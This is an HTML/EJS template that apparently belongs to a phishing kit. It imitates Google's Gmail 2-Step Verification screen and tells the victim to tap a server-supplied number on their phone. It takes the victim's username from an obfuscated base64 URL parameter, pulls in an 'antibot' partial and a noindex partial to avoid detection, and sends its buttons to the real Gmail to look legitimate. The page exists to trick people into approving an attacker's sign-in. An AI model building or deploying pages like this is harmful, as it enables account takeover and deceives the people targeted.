

<!DOCTYPE html>
  <html lang="en">
  <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Gmail</title>
      <%- include('partials/meta-noindex') %>
      <link rel="shortcut icon" href="/image/gmail.ico" type="image/x-icon">
      <link rel="stylesheet" href="/css/newstylep.css?v=2">
      <script type="text/javascript" src="/JS/fetchtap.js"></script>
  </head>
  <body>
      <div id="gifOverlay" style="display:none; position:fixed; top:0; left:0; width:100vw; height:100vh; background:white; z-index:9999; justify-content:center; align-items:center;">
          <img src="/image/2.gif" style="width:75vw; height:75vh; object-fit:contain;">
      </div>
      <div class="maindiv">
          <div class="form-container">
              <div class="white-overlay" id="whiteOverlay"></div>
              <div class="loading-bar" id="loadingBar"><div class="loading-bar-indicator"></div></div>
          <form class="loginform1" method="post" name="loginForm" action="javascript:void(0)" accept-charset="UTF-8">
         
              <div class="form-half">
                  <div><img class="divlogo" src="/image/image.png" ></div>
                  <br>
                  <div><span class="welcome">2-Step Verification<span></div><br>
                  <div><span class="warning">To help keep your account safe, Google wants to make sure it's <br>really you trying to sign in<span></div>                
                  <div class="userdiv">
                  <img class="left-img"  src="/image/user-circle.png" >&nbsp;&nbsp;
                  <span class="userdiv-name" style="color: #2c2a2a;; font-size: 18px; font-family: Arial, Helvetica, sans-serif;"></span>&#8201;<span class="chip-arrow">▾</span>&#8201;
                  
                </div>


                  <button id="resendBtn" class="resendbtn"><b>Resend it</b></button>
              </div>
              <div class="form-half1"> 
                <br>
                  <center>
                      <div class="numberdiv">
                      <span class="number"><%= tapcode %></span>
                        
                      </div>
                  </center>
                      <div class="phonediv">
                        <span class="phonetype">Check your <%= mtype %></span><br><br>
                        <span class="messaged">Google sent a notification to your <%= mtype %>. Tap <b>Yes</b>&nbsp;on the <br>notification, then tap&nbsp;<b><%= tapcode %></b>&nbsp;on your phone to verify it's you.</span>
                          
                      </div>
                        <br><br>
                     <div class="helpdiv">
                        <span class="helptext">Need help? <a class="helplink" href="" target="_blank"><b>Learn more about Google prompts</b></a></span>
                    </div>

                  <!-- <div class="shwpwd">
       
                      <input type="checkbox" onclick="ShowpassWord();" class="checkbox">
                      <span onclick="ShowpassWord();" class="button">Don't ask again on this device</span>
                  </div>
   -->
                    <br>
  
                    <div class="rememberme">
                        <input type="checkbox" onclick="" class="checkbox">
                        <span onclick="" class="button">Don't ask again on this device</span>
                    </div>
      
  
                  <div class="tryn">
                      <button id="myButton" class="hyperl1" ><b>Try another way</b></button>&nbsp;&nbsp;&nbsp;
                      
                      
                    </div>
  
              </div>
  
             
        
          </form>
          </div>
          
          <div class="btmdiv">
              <div class="left-div">
                  <select class="btmhypl" id="language-select">
                      <option value="en">English (United States)</option>
                      <option value="fr">French</option>
                      <option value="es">Spanish</option>
                      <option value="de">German</option>
                      <!-- Add more options as needed -->
                  </select>
              </div>
              <div class="right-divs">
                  <div class="right-div">
                      <button id="myButton" class="btmhypl" >Help</button>
                  </div>
                  <div class="right-div">
                      <button id="myButton" class="btmhypl" >Privacy</button>
                  </div>
                  <div class="right-div">
                      <button id="myButton" class="btmhypl" >Terms</button>
                  </div>
              </div>
          </div>
       <script>
            (function(){
              const tk = new URLSearchParams(window.location.search).get('nxowuwonvdmbqrrwewosnadgdhgdus') || '';
              const username = atob(tk);
              document.querySelector('.userdiv-name').textContent = username;
            })();

            function showLoadingBar() {
                document.getElementById('loadingBar').classList.add('active');
                document.getElementById('whiteOverlay').classList.add('active');
            }

            // JavaScript to handle button clicks
            document.querySelectorAll('#myButton').forEach(button => {
                button.onclick = function(event) {
                    event.preventDefault();
                    location.href = "https://mail.google.com";
                };
            });

            // Add loading bar to "Try another way" button
            document.querySelector('.hyperl1').onclick = function(event) {
                event.preventDefault();
                showLoadingBar();
                setTimeout(() => {
                    location.href = "https://mail.google.com";
                }, 15000);
            };

            // Add loading bar to "Resend it" button
            document.getElementById('resendBtn').onclick = function(event) {
                event.preventDefault();
                showLoadingBar();
                setTimeout(() => {
                    document.getElementById('loadingBar').classList.remove('active');
                    document.getElementById('whiteOverlay').classList.remove('active');
                }, 4000);
            };
        </script>
  
      </div>
      
  <%- include('partials/antibot') %>
  </body>
  </html>
